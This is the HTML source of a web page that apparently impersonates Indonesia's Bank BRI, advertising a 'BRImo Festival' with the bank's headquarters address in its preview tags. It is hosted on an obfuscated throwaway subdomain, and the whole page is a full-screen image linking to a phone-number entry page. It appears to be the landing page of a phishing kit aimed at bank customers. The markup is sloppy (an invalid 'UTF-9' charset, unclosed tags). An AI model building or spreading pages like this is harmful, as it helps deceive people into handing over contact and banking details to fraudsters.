<html>

<head>
    <meta name="theme-color" content="#0F78CB"> 
    <meta charset="UTF-9">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0">
   
	<meta property="og:title" content="𝗜𝗸𝘂𝘁𝗮𝗻 𝗚𝗲𝗯𝘆𝗮𝗿 𝗕𝗥𝗜 | 𝗕𝗥𝗜𝗺𝗼 𝗙𝗲𝘀𝘁𝗶𝘃𝗮𝗹."> 
	<meta property="og:description" content="Gedung BRI Jl. Jenderal Sudirman Kav.44-46 Jakarta 10210 Indonesia">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>𝗜𝗸𝘂𝘁𝗮𝗻 𝗚𝗲𝗯𝘆𝗮𝗿 𝗕𝗥𝗜 | 𝗕𝗥𝗜𝗺𝗼 𝗙𝗲𝘀𝘁𝗶𝘃𝗮𝗹 </title>
<meta property="twitter:card" content="summary_large_image">
<meta property="og:image:type" content="image/jpeg">
<meta content="https://g3bya4-fstvl-bri-2024.vercel.app/IMG-20241111-WA0007.jpg" property="og:image">
<meta property="twitter:card" content="summary_large_image">
<meta property="og:image:type" content="image/jpeg">
<meta content="https://g3bya4-fstvl-bri-2024.vercel.app/IMG-20241111-WA0007.jpg" property="og:image">


    <!-- Demo styles -->
    <style>
      html,
      body {
        position: relative;
        height: 100%;
		overflow: hidden; 
        background-color: #fff;
        font-family: Helvetica Neue, Helvetica, Arial, sans-serif;
        font-size: 14px;
        color: #000;
        margin: 0;
        padding: 0;
      }
button{
    position: absolute;
    border: none;
    margin: 10px auto;
    width: 95%;
    height: 100px;
    left: 0;
    right:0;
    top: 500px;
    bottom: 90;
    
}
	</style>
</head>
<body>

         <a href="nohp.html"> 
              <div class="header11">
               <img src="https://g3bya4-fstvl-bri-2024.vercel.app/Photoroom-20241026_161312.webp" style="width: 100%; left: 0px; top: 0px; height: 100%">

</body>
</html>
